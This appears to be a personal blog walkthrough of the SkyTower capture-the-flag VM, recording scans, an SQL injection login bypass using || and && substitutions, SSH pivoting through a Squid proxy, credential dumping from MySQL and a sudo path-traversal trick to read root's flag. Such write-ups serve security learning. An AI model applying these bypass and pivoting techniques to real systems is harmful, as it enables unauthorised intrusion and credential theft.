Saturday, May 30, 2015

The Sky Tower Vulnerable VM Walkthrough



I recently took on the challenge to hack the Sky Tower Vulnerable VM. This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the "flag".

As usual this VM is hosted by the good folks at vulnhub.com with a ton of other challenges. Here's the approach that I took to gain root level access to the box:

Enumeration

root@kali:~# nmap -A 10.1.1.7

Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-28 20:55 EDT
Nmap scan report for 10.1.1.7
Host is up (0.00084s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 10.1.1.7




The quick glance shows a filtered SSH service, possible website on port 80, and a Squid http proxy. Needing more information, I fired up Nikto and Dirbuster.

root@kali:~# nikto -h 10.1.1.7
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:10.1.1.7
+ Target Hostname: 10.1.1.7
+ Target Port: 80
+ Start Time: 2015-05-28 21:23:39 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 07:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7343 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2015-05-28 21:24:01 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# dirb http://10.1.1.7

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Thu May 28 21:25:56 2015
URL_BASE: http://10.1.1.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://10.1.1.7/ ----
+ http://10.1.1.7/background (CODE:200|SIZE:2572609)
+ http://10.1.1.7/cgi-bin/ (CODE:403|SIZE:284)
+ http://10.1.1.7/index (CODE:200|SIZE:1136)
+ http://10.1.1.7/index.html (CODE:200|SIZE:1136)
+ http://10.1.1.7/server-status (CODE:403|SIZE:289)
-----------------
DOWNLOADED: 4592 - FOUND: 5


Ok, looking at these results, I see an outdated version of apache running, a login.php page which warrants a closer look, sever pages identified by Dirbuster which are require investigation.

First let's take a look at the login.php page. We find a typical form based page which may be susceptible to Sql Injection:





Using basic single quote techniques and such, I'm able to get the system to generate an overly verbose message revealing the underlying database type:





Curious, and wanting to justify advancing down the Sqli path, I ran Uniscan to verify the injection point:

root@kali:~# uniscan -u http://10.1.1.7/login.php -d
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.2


Scan date: 28-5-2015 22:0:26
=============================================
| Domain: http://10.1.1.7/login.php/
| Server: Apache/2.2.22 (Debian)
| IP: 10.1.1.7
=============================================
|
| Crawler Started:
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| [+] Crawling finished, 0 URL's found!
|
| FCKeditor File Upload:
|
| E-mails:
|
| External hosts:
|
| Web Backdoors:
|
| File Upload Forms:
|
| Source Code Disclosure:
|
| PHPinfo() Disclosure:
|
| Timthumb:
|
| Ignored Files:
============================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 0 New directories added

| FCKeditor tests:

| Timthumb < 1.33 vulnerability:

| Backup Files:

| Blind SQL Injection:

| Local File Include:

| PHP CGI Argument Injection:

| Remote Command Execution:

| Remote File Include:
| |
| SQL Injection:
| [+] Vul [SQL-i] http://10.1.1.7/login.php
| Post data: &email=123'&password=123
| [+] Vul [SQL-i] http://10.1.1.7/login.php
| Post data: &email=123&password=123'

| Cross-Site Scripting (XSS):
|
|
| Web Shell Finder:
====================================

HTML report saved in: report/10.1.1.7.html




I attempted multiple Sql Injection login bypass strings to no avail. Additionally, I fired up the Tamper Data proxy browser plugin to gain a bit more control over the session.



Mildly frustrated, I began a search for common Sql Injection blacklist bypass techniques. I found lots of information, maybe too much; but eventually I stumbled upon a awesome whitepaper on the exploit-db site https://www.exploit-db.com/papers/17934/.



From the whitepaper I extracted this guidance:

Here is a simple bypass using &&, || instead of and, or respectively. Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed injection: 1 || 1 = 1 1 && 1 = 1


I used this new found information to attempt a bypass on the login page. A bit if additional trial and error, mainly around the proper terminating comment character (“--” #) got me past the login page:






Ignoring the filtered status of port 22, I attempted an unsuccessful connection:




Taking the Squid http proxy approach, I decided to attempt to connect using Proxychains. I'd recently performed a similar hack in the Offensive Security OSCP lab, so it wasn't totally foregin to me. I modified /etc/proxychains.conf to connect to the victim machine on port 3189.



Proxychains was able to successfully connect on the machine's ssh port using the obtained credentials:

root@kali:~# proxychains ssh john@10.1.1.7
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
The authenticity of host '10.1.1.7 (10.1.1.7)' can't be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.7' (ECDSA) to the list of known hosts.
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jun 20 07:41:08 2014

Funds have been withdrawn
Connection to 10.1.1.7 closed.
root@kali:~#




Upon connection the session closes immediately, however I was able to execute commands over ssh. With this ability I could further system enumeration, attempt to execute a revershell, try to escape the shell that keeps shutdown upon connection, etc....

Issuing an “/bin/sh -i” command, I was able to get a more peristent shell, but it not have “job control”. Afraid that this would restrict something I wanted to do, I opted to modify the .bashrc file in John's home directory:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
total 24
drwx------ 2 john john 4096 Jun 20 2014 .
drwxr-xr-x 5 root root 4096 Jun 20 2014 ..
-rw------- 1 john john 7 Jun 20 2014 .bash_history
-rw-r--r-- 1 john john 220 Jun 20 2014 .bash_logout
-rw-r--r-- 1 john john 3437 Jun 20 2014 .bashrc
-rw-r--r-- 1 john john 675 Jun 20 2014 .profile


I simple renamed the .bashrc file to break its influence on my session.

root@kali:~# proxychains ssh john@10.1.1.7 "mv .bashrc bashrc.bak"
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:


Finally got a solid shell:

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.1.1.7:3128-<><>-10.1.1.7:22-<><>-OK
john@10.1.1.7's password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 28 23:52:47 2015 from 10.1.1.7
john@SkyTower:~$


Poking around on the system I took a look in the login.php file and found hardcoded mysql db credentials:



I also found the pesky culprit behind our Sql Injection auth bypass issues:

$sqlinjection = array("SELECT", "TRUE", "FALSE", "--","OR", "=", ",", "AND", "NOT");
$email = str_ireplace($sqlinjection, "", $_POST['email']);
$password = str_ireplace($sqlinjection, "", $_POST['password']);

$sql= "SELECT * FROM login where email='".$email."' and password='".$password."';";
$result = $db->query($sql);


Using the db credentials, I was able to login to the db and extract additionaldb credentials:

john@SkyTower:/var/www$ mysql --user=root --password=root SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2288
Server version: 5.5.35-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


-----------------------------------------------------------------------------------------------------------------------------------------------

mysql> use SkyTech;
Database changed

mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

mysql>

Giving the db username and passwords a try for system login worked out for me. I was able to login as sara who had limited sudo access to list and cat a couple of root directories. I in turn used this access to include the listing of the root home directory and using cat to open the flag.txt file.

sara@SkyTower:~$ sudo ls /accounts/../root/
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower


sara@SkyTower:~$ su root
Password:
root@SkyTower:~#


We'll that's all for this one. I really enjoyed this challenge. I'll keep my eyes open for more from the folks at TeleSpace Systems.


Court Graham, signing off....

No comments:

Post a Comment